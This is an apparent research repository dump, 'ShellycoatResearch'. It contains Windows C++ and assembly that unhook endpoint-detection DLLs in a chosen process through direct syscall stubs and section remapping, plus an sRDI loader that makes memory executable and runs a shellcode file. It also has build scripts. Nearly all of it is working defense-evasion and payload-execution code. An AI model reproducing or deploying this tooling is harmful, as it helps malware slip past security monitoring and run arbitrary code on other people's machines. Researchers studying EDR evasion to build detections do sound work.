/ShellycoatResearch/Screenshots/why-syscall.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Screenshots/why-syscall.png -------------------------------------------------------------------------------- /ShellycoatResearch/Src/Structs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | // Macros 6 | // ------------------------------------------------------------------------ 7 | 8 | #define STATUS_SUCCESS 0 9 | 10 | #define NtCurrentProcess() INVALID_HANDLE_VALUE//((HANDLE)(LONG_PTR)-1) 11 | 12 | #define STATUS_IMAGE_NOT_AT_BASE 1073741827 13 | 14 | #define FILE_OPEN 0x00000001 15 | 16 | #define FILE_NON_DIRECTORY_FILE 0x00000040 17 | 18 | #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 19 | 20 | // Struct/Enum definitions 21 | // ------------------------------------------------------------------------ 22 | 23 | typedef struct _UNICODE_STRING { 24 | USHORT Length; 25 | USHORT MaximumLength; 26 | PWSTR Buffer; 27 | } UNICODE_STRING, *PUNICODE_STRING; 28 | 29 | typedef const UNICODE_STRING* PCUNICODE_STRING; 30 | 31 | typedef struct _PEB_LDR_DATA { 32 | ULONG Length; 33 | BOOLEAN Initialized; 34 | HANDLE SsHandle; 35 | LIST_ENTRY InLoadOrderModuleList; 36 | LIST_ENTRY InMemoryOrderModuleList; 37 | LIST_ENTRY InInitializationOrderModuleList; 38 | PVOID EntryInProgress; 39 | BOOLEAN ShutdownInProgress; 40 | HANDLE ShutdownThreadId; 41 | } PEB_LDR_DATA, *PPEB_LDR_DATA; 42 | 43 | typedef struct _RTL_USER_PROCESS_PARAMETERS { 44 | BYTE Reserved1[16]; 45 | PVOID Reserved2[10]; 46 | UNICODE_STRING ImagePathName; 47 | UNICODE_STRING CommandLine; 48 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 49 | 50 | typedef struct _API_SET_NAMESPACE { 51 | ULONG Version; 52 | ULONG Size; 53 | ULONG Flags; 54 | ULONG Count; 55 | ULONG EntryOffset; 56 | ULONG HashOffset; 57 | ULONG HashFactor; 58 | } API_SET_NAMESPACE, *PAPI_SET_NAMESPACE; 59 | 60 | // Partial PEB 61 | typedef struct _PEB { 62 | BOOLEAN InheritedAddressSpace; 63 | BOOLEAN ReadImageFileExecOptions; 64 | BOOLEAN BeingDebugged; 65 | union 66 | { 67 | BOOLEAN BitField; 68 | struct 69 | { 70 | BOOLEAN ImageUsesLargePages : 1; 71 | BOOLEAN IsProtectedProcess : 1; 72 | BOOLEAN IsLegacyProcess : 1; 73 | BOOLEAN IsImageDynamicallyRelocated : 1; 74 | BOOLEAN SkipPatchingUser32Forwarders : 1; 75 | BOOLEAN SpareBits : 3; 76 | }; 77 | }; 78 | HANDLE Mutant; 79 | 80 | PVOID ImageBaseAddress; 81 | PPEB_LDR_DATA Ldr; 82 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 83 | PVOID SubSystemData; 84 | PVOID ProcessHeap; 85 | PRTL_CRITICAL_SECTION FastPebLock; 86 | PVOID IFEOKey; 87 | PSLIST_HEADER AtlThunkSListPtr; 88 | union 89 | { 90 | ULONG CrossProcessFlags; 91 | struct 92 | { 93 | ULONG ProcessInJob : 1; 94 | ULONG ProcessInitializing : 1; 95 | ULONG ProcessUsingVEH : 1; 96 | ULONG ProcessUsingVCH : 1; 97 | ULONG ProcessUsingFTH : 1; 98 | ULONG ProcessPreviouslyThrottled : 1; 99 | ULONG ProcessCurrentlyThrottled : 1; 100 | ULONG ProcessImagesHotPatched : 1; 101 | ULONG ReservedBits0 : 24; 102 | }; 103 | }; 104 | union 105 | { 106 | PVOID KernelCallbackTable; 107 | PVOID UserSharedInfoPtr; 108 | }; 109 | ULONG SystemReserved; 110 | ULONG AtlThunkSListPtr32; 111 | PAPI_SET_NAMESPACE ApiSetMap; 112 | ULONG TlsExpansionCounter; 113 | PVOID TlsBitmap; 114 | ULONG TlsBitmapBits[2]; 115 | PVOID ReadOnlySharedMemoryBase; 116 | PVOID SharedData; 117 | PVOID *ReadOnlyStaticServerData; 118 | PVOID AnsiCodePageData; 119 | PVOID OemCodePageData; 120 | PVOID UnicodeCaseTableData; 121 | ULONG NumberOfProcessors; 122 | ULONG NtGlobalFlag; 123 | ULARGE_INTEGER CriticalSectionTimeout; 124 | SIZE_T HeapSegmentReserve; 125 | SIZE_T HeapSegmentCommit; 126 | SIZE_T HeapDeCommitTotalFreeThreshold; 127 | SIZE_T HeapDeCommitFreeBlockThreshold; 128 | ULONG NumberOfHeaps; 129 | ULONG MaximumNumberOfHeaps; 130 | PVOID *ProcessHeaps; 131 | PVOID GdiSharedHandleTable; 132 | PVOID ProcessStarterHelper; 133 | ULONG GdiDCAttributeList; 134 | PRTL_CRITICAL_SECTION LoaderLock; 135 | ULONG OSMajorVersion; 136 | ULONG OSMinorVersion; 137 | USHORT OSBuildNumber; 138 | } PEB, *PPEB; 139 | 140 | typedef struct _TEB { 141 | PVOID Reserved1[12]; 142 | PPEB ProcessEnvironmentBlock; 143 | PVOID Reserved2[399]; 144 | BYTE Reserved3[1952]; 145 | PVOID TlsSlots[64]; 146 | BYTE Reserved4[8]; 147 | PVOID Reserved5[26]; 148 | PVOID ReservedForOle; 149 | PVOID Reserved6[4]; 150 | PVOID TlsExpansionSlots; 151 | } TEB, *PTEB; 152 | 153 | typedef struct _OBJECT_ATTRIBUTES { 154 | ULONG Length; 155 | HANDLE RootDirectory; 156 | PUNICODE_STRING ObjectName; 157 | ULONG Attributes; 158 | PVOID SecurityDescriptor; 159 | PVOID SecurityQualityOfService; 160 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 161 | 162 | typedef struct _IO_STATUS_BLOCK { 163 | union { 164 | NTSTATUS Status; 165 | VOID* Pointer; 166 | }; 167 | ULONG_PTR Information; 168 | } IO_STATUS_BLOCK, * PIO_STATUS_BLOCK; 169 | 170 | typedef enum _SECTION_INHERIT { 171 | ViewShare = 1, 172 | ViewUnmap = 2 173 | } SECTION_INHERIT, *PSECTION_INHERIT; -------------------------------------------------------------------------------- /ShellycoatResearch/Src/dllmain.cpp: -------------------------------------------------------------------------------- 1 | #include "Structs.h" 2 | #include "Syscalls.h" 3 | #include "SectionRemap.h" 4 | 5 | #include 6 | #include 7 | //#include 8 | //#include 9 | 10 | // Call after DLL is loaded 11 | // ------------------------------------------------------------------------ 12 | 13 | int go(int pid, std::string dllToFix) { 14 | // [DEBUG] 15 | Sleep(50); 16 | printf("[DBG] Preparing to baptize tainted dll!\n"); 17 | 18 | // Resolve the direct syscalls 19 | Sleep(50); 20 | if (!resolve_syscalls()) { 21 | printf("[DBG] Failed to resolve syscalls!\n"); 22 | return -1; 23 | } 24 | Sleep(50); 25 | printf("[DBG] Syscalls resolved!\n"); 26 | 27 | // Attempt to perform Section Remapping 28 | Sleep(50); 29 | if (!section_remap(pid, dllToFix)) { 30 | printf("[DBG] Failed to perform Section Remapping!\n"); 31 | return -2; 32 | } 33 | Sleep(50); 34 | printf("[DBG] Section Remapping done!\n"); 35 | return 0; 36 | } 37 | 38 | // DllMain 39 | // ------------------------------------------------------------------------ 40 | //BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { 41 | //void main() { 42 | // go(10); 43 | //} 44 | 45 | int main(int argc, char *argv[]) { 46 | if (argc != 3) 47 | { 48 | printf("Supply pid and dll filename (without .dll) as argument. \n"); 49 | return -1; 50 | } 51 | 52 | int pid = atoi(argv[1]); 53 | std::string dllToFix = argv[2]; 54 | printf("Target pid: %d\n", pid); 55 | return go(pid,dllToFix); 56 | } -------------------------------------------------------------------------------- /ShellycoatResearch/Src/stub.binaaa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Src/stub.binaaa -------------------------------------------------------------------------------- /ShellycoatResearch/Src/sysc_sw1.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | NtWriteVirtualMemory PROC 4 | mov rax, gs:[60h] ; Load PEB into RAX. 5 | NtWriteVirtualMemory_Check_X_X_XXXX: ; Check major version. 6 | cmp dword ptr [rax+118h], 10 7 | je NtWriteVirtualMemory_Check_10_0_XXXX 8 | jmp NtWriteVirtualMemory_SystemCall_Unknown 9 | NtWriteVirtualMemory_Check_10_0_XXXX: ; Check build number for Windows 10. 10 | cmp word ptr [rax+120h], 10240 11 | je NtWriteVirtualMemory_SystemCall_10_0_10240 12 | cmp word ptr [rax+120h], 10586 13 | je NtWriteVirtualMemory_SystemCall_10_0_10586 14 | cmp word ptr [rax+120h], 14393 15 | je NtWriteVirtualMemory_SystemCall_10_0_14393 16 | cmp word ptr [rax+120h], 15063 17 | je NtWriteVirtualMemory_SystemCall_10_0_15063 18 | cmp word ptr [rax+120h], 16299 19 | je NtWriteVirtualMemory_SystemCall_10_0_16299 20 | cmp word ptr [rax+120h], 17134 21 | je NtWriteVirtualMemory_SystemCall_10_0_17134 22 | cmp word ptr [rax+120h], 17763 23 | je NtWriteVirtualMemory_SystemCall_10_0_17763 24 | cmp word ptr [rax+120h], 18362 25 | je NtWriteVirtualMemory_SystemCall_10_0_18362 26 | cmp word ptr [rax+120h], 18363 27 | je NtWriteVirtualMemory_SystemCall_10_0_18363 28 | cmp word ptr [rax+120h], 19041 29 | je NtWriteVirtualMemory_SystemCall_10_0_19041 30 | cmp word ptr [rax+120h], 19042 31 | je NtWriteVirtualMemory_SystemCall_10_0_19042 32 | jmp NtWriteVirtualMemory_SystemCall_Unknown 33 | NtWriteVirtualMemory_SystemCall_10_0_10240: ; Windows 10.0.10240 (1507) 34 | mov eax, 003ah 35 | jmp NtWriteVirtualMemory_Epilogue 36 | NtWriteVirtualMemory_SystemCall_10_0_10586: ; Windows 10.0.10586 (1511) 37 | mov eax, 003ah 38 | jmp NtWriteVirtualMemory_Epilogue 39 | NtWriteVirtualMemory_SystemCall_10_0_14393: ; Windows 10.0.14393 (1607) 40 | mov eax, 003ah 41 | jmp NtWriteVirtualMemory_Epilogue 42 | NtWriteVirtualMemory_SystemCall_10_0_15063: ; Windows 10.0.15063 (1703) 43 | mov eax, 003ah 44 | jmp NtWriteVirtualMemory_Epilogue 45 | NtWriteVirtualMemory_SystemCall_10_0_16299: ; Windows 10.0.16299 (1709) 46 | mov eax, 003ah 47 | jmp NtWriteVirtualMemory_Epilogue 48 | NtWriteVirtualMemory_SystemCall_10_0_17134: ; Windows 10.0.17134 (1803) 49 | mov eax, 003ah 50 | jmp NtWriteVirtualMemory_Epilogue 51 | NtWriteVirtualMemory_SystemCall_10_0_17763: ; Windows 10.0.17763 (1809) 52 | mov eax, 003ah 53 | jmp NtWriteVirtualMemory_Epilogue 54 | NtWriteVirtualMemory_SystemCall_10_0_18362: ; Windows 10.0.18362 (1903) 55 | mov eax, 003ah 56 | jmp NtWriteVirtualMemory_Epilogue 57 | NtWriteVirtualMemory_SystemCall_10_0_18363: ; Windows 10.0.18363 (1909) 58 | mov eax, 003ah 59 | jmp NtWriteVirtualMemory_Epilogue 60 | NtWriteVirtualMemory_SystemCall_10_0_19041: ; Windows 10.0.19041 (2004) 61 | mov eax, 003ah 62 | jmp NtWriteVirtualMemory_Epilogue 63 | NtWriteVirtualMemory_SystemCall_10_0_19042: ; Windows 10.0.19042 (20H2) 64 | mov eax, 003ah 65 | jmp NtWriteVirtualMemory_Epilogue 66 | NtWriteVirtualMemory_SystemCall_Unknown: ; Unknown/unsupported version. 67 | ret 68 | NtWriteVirtualMemory_Epilogue: 69 | mov r10, rcx 70 | syscall 71 | ret 72 | NtWriteVirtualMemory ENDP 73 | 74 | end -------------------------------------------------------------------------------- /ShellycoatResearch/Src/sysc_sw1.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | EXTERN_C NTSTATUS NtWriteVirtualMemory( 6 | IN HANDLE ProcessHandle, 7 | IN PVOID BaseAddress, 8 | IN PVOID Buffer, 9 | IN SIZE_T NumberOfBytesToWrite, 10 | OUT PSIZE_T NumberOfBytesWritten OPTIONAL); 11 | 12 | -------------------------------------------------------------------------------- /ShellycoatResearch/Src/syscalls64.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; --------------------------------------------------------------------- 6 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 7 | ; --------------------------------------------------------------------- 8 | 9 | NtCreateFile7SP1 proc 10 | mov r10, rcx 11 | mov eax, 52h 12 | syscall 13 | ret 14 | NtCreateFile7SP1 endp 15 | 16 | NtCreateSection7SP1 proc 17 | mov r10, rcx 18 | mov eax, 47h 19 | syscall 20 | ret 21 | NtCreateSection7SP1 endp 22 | 23 | NtMapViewOfSection7SP1 proc 24 | mov r10, rcx 25 | mov eax, 25h 26 | syscall 27 | ret 28 | NtMapViewOfSection7SP1 endp 29 | 30 | NtProtectVirtualMemory7SP1 proc 31 | mov r10, rcx 32 | mov eax, 4Dh 33 | syscall 34 | ret 35 | NtProtectVirtualMemory7SP1 endp 36 | 37 | NtUnmapViewOfSection7SP1 proc 38 | mov r10, rcx 39 | mov eax, 27h 40 | syscall 41 | ret 42 | NtUnmapViewOfSection7SP1 endp 43 | 44 | NtClose7SP1 proc 45 | mov r10, rcx 46 | mov eax, 0Ch 47 | syscall 48 | ret 49 | NtClose7SP1 endp 50 | 51 | ;---------------------------------------------------------------------- 52 | ; Windows 8 / Server 2012 specific syscalls 53 | ; --------------------------------------------------------------------- 54 | 55 | NtCreateFile80 proc 56 | mov r10, rcx 57 | mov eax, 53h 58 | syscall 59 | ret 60 | NtCreateFile80 endp 61 | 62 | NtCreateSection80 proc 63 | mov r10, rcx 64 | mov eax, 48h 65 | syscall 66 | ret 67 | NtCreateSection80 endp 68 | 69 | NtMapViewOfSection80 proc 70 | mov r10, rcx 71 | mov eax, 26h 72 | syscall 73 | ret 74 | NtMapViewOfSection80 endp 75 | 76 | NtProtectVirtualMemory80 proc 77 | mov r10, rcx 78 | mov eax, 4Eh 79 | syscall 80 | ret 81 | NtProtectVirtualMemory80 endp 82 | 83 | NtUnmapViewOfSection80 proc 84 | mov r10, rcx 85 | mov eax, 28h 86 | syscall 87 | ret 88 | NtUnmapViewOfSection80 endp 89 | 90 | NtClose80 proc 91 | mov r10, rcx 92 | mov eax, 0Dh 93 | syscall 94 | ret 95 | NtClose80 endp 96 | 97 | ;---------------------------------------------------------------------- 98 | ; Windows 8.1 / Server 2012 R2 specific syscalls 99 | ; --------------------------------------------------------------------- 100 | 101 | NtCreateFile81 proc 102 | mov r10, rcx 103 | mov eax, 54h 104 | syscall 105 | ret 106 | NtCreateFile81 endp 107 | 108 | NtCreateSection81 proc 109 | mov r10, rcx 110 | mov eax, 49h 111 | syscall 112 | ret 113 | NtCreateSection81 endp 114 | 115 | NtMapViewOfSection81 proc 116 | mov r10, rcx 117 | mov eax, 27h 118 | syscall 119 | ret 120 | NtMapViewOfSection81 endp 121 | 122 | NtProtectVirtualMemory81 proc 123 | mov r10, rcx 124 | mov eax, 4Fh 125 | syscall 126 | ret 127 | NtProtectVirtualMemory81 endp 128 | 129 | NtUnmapViewOfSection81 proc 130 | mov r10, rcx 131 | mov eax, 29h 132 | syscall 133 | ret 134 | NtUnmapViewOfSection81 endp 135 | 136 | NtClose81 proc 137 | mov r10, rcx 138 | mov eax, 0Eh 139 | syscall 140 | ret 141 | NtClose81 endp 142 | 143 | ;---------------------------------------------------------------------- 144 | ; Windows 10 / Server 2016 specific syscalls 145 | ; --------------------------------------------------------------------- 146 | 147 | NtCreateFile10 proc 148 | mov r10, rcx 149 | mov eax, 55h 150 | syscall 151 | ret 152 | NtCreateFile10 endp 153 | 154 | NtCreateSection10 proc 155 | mov r10, rcx 156 | mov eax, 4Ah 157 | syscall 158 | ret 159 | NtCreateSection10 endp 160 | 161 | NtMapViewOfSection10 proc 162 | mov r10, rcx 163 | mov eax, 28h 164 | syscall 165 | ret 166 | NtMapViewOfSection10 endp 167 | 168 | NtProtectVirtualMemory10 proc 169 | mov r10, rcx 170 | mov eax, 50h 171 | syscall 172 | ret 173 | NtProtectVirtualMemory10 endp 174 | 175 | NtUnmapViewOfSection10 proc 176 | mov r10, rcx 177 | mov eax, 2Ah 178 | syscall 179 | ret 180 | NtUnmapViewOfSection10 endp 181 | 182 | NtClose10 proc 183 | mov r10, rcx 184 | mov eax, 0Fh 185 | syscall 186 | ret 187 | NtClose10 endp 188 | 189 | ZOP10 proc 190 | mov r10, rcx 191 | mov eax, 26h 192 | syscall 193 | ret 194 | ZOP10 endp 195 | 196 | ; --------------------------------------------------------------------- 197 | end 198 | ; --------------------------------------------------------------------- -------------------------------------------------------------------------------- /ShellycoatResearch/Testing/Loader.cpp: -------------------------------------------------------------------------------- 1 | // sRDI Loader 2 | // Credits: Nick Landers(@monoxgas) and SBS Team 3 | 4 | #include 5 | #include 6 | 7 | DWORD GetFileContents(LPCSTR filename, LPSTR *data, DWORD &size) { 8 | std::FILE *fp = std::fopen(filename, "rb"); 9 | 10 | if (fp) { 11 | fseek(fp, 0, SEEK_END); 12 | size = ftell(fp); 13 | fseek(fp, 0, SEEK_SET); 14 | 15 | *data = (LPSTR)malloc(size + 1); 16 | fread(*data, size, 1, fp); 17 | fclose(fp); 18 | return true; 19 | } 20 | return false; 21 | } 22 | 23 | typedef UINT_PTR(WINAPI * RDI)(); 24 | 25 | int main(int argc, char *argv[], char *envp[]) { 26 | LPSTR finalShellcode = NULL, data = NULL; 27 | DWORD finalSize, dataSize; 28 | DWORD dwOldProtect1 = 0; 29 | SYSTEM_INFO sysInfo; 30 | 31 | // For any MessageBox testing in the blob 32 | HMODULE test = LoadLibraryA("User32.dll"); 33 | 34 | if (argc < 2) { 35 | printf("\n[!] Usage:\n\n\tNativeLoader.exe \n"); 36 | return 0; 37 | } 38 | 39 | if (!GetFileContents(argv[1], &data, dataSize)) { 40 | printf("\n[!] Failed to load file\n"); 41 | return 0; 42 | } 43 | 44 | if (data[0] == 'M' && data[1] == 'Z') { 45 | printf("[+] File is a DLL, please convert first\n"); 46 | return 0; 47 | } 48 | else { 49 | printf("[+] File is a shellcode, attempting to inline execute\n"); 50 | finalShellcode = data; 51 | finalSize = dataSize; 52 | } 53 | 54 | // Wait for user interaction to fire payload 55 | printf("[!] Press any key to fire payload!\n"); 56 | getchar(); 57 | 58 | GetNativeSystemInfo(&sysInfo); 59 | 60 | // Only set the first page to RWX 61 | // This is should sufficiently cover the sRDI shellcode up top 62 | if (VirtualProtect(finalShellcode, sysInfo.dwPageSize, PAGE_EXECUTE_READWRITE, &dwOldProtect1)) { 63 | RDI rdi = (RDI)(finalShellcode); 64 | UINT_PTR hLoadedDLL = rdi(); // Excute DLL 65 | 66 | free(finalShellcode); // Free the RDI blob. We no longer need it. 67 | } 68 | 69 | return 0; 70 | } 71 | 72 | -------------------------------------------------------------------------------- /ShellycoatResearch/Testing/compile64.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /EHsc Loader.cpp /link /OUT:loader.exe /SUBSYSTEM:CONSOLE /RELEASE /MACHINE:x64 /MERGE:_RDATA=.text /EMITPOGOPHASEINFO 4 | del *.obj -------------------------------------------------------------------------------- /ShellycoatResearch/Testing/edr.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ShellycoatResearch/Testing/edr.dll -------------------------------------------------------------------------------- /ShellycoatResearch/compile64_cli2.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | "c:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29910\bin\Hostx86\x64\ml64.exe" /c /Cx Src\\syscalls64.asm 4 | "c:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\VC\Tools\MSVC\14.28.29910\bin\Hostx86\x64\ml64.exe" /c /Cx Src\\sysc_sw1.asm 5 | cl.exe /nologo /MT /GS- /Od /DNDEBUG /W4 /Tp Src\\dllmain.cpp /link syscalls64.obj sysc_sw1.obj Kernel32.lib ucrt.lib libvcruntime.lib libcmt.lib libcpmt.lib /NODEFAULTLIB /ENTRY:mainCRTStartup /OUT:Bin\\shellycoat_x64.exe /MACHINE:x64 /Brepro /RELEASE /MERGE:_RDATA=.text /EMITPOGOPHASEINFO 6 | 7 | rem cd Python & python ConvertToShellcode.py -c -f "" -u "" -i ..\\Bin\shellycoat_x64.dll & cd .. 8 | del dllmain.obj 9 | del syscalls64.obj 10 | del sysc_sw1.obj --------------------------------------------------------------------------------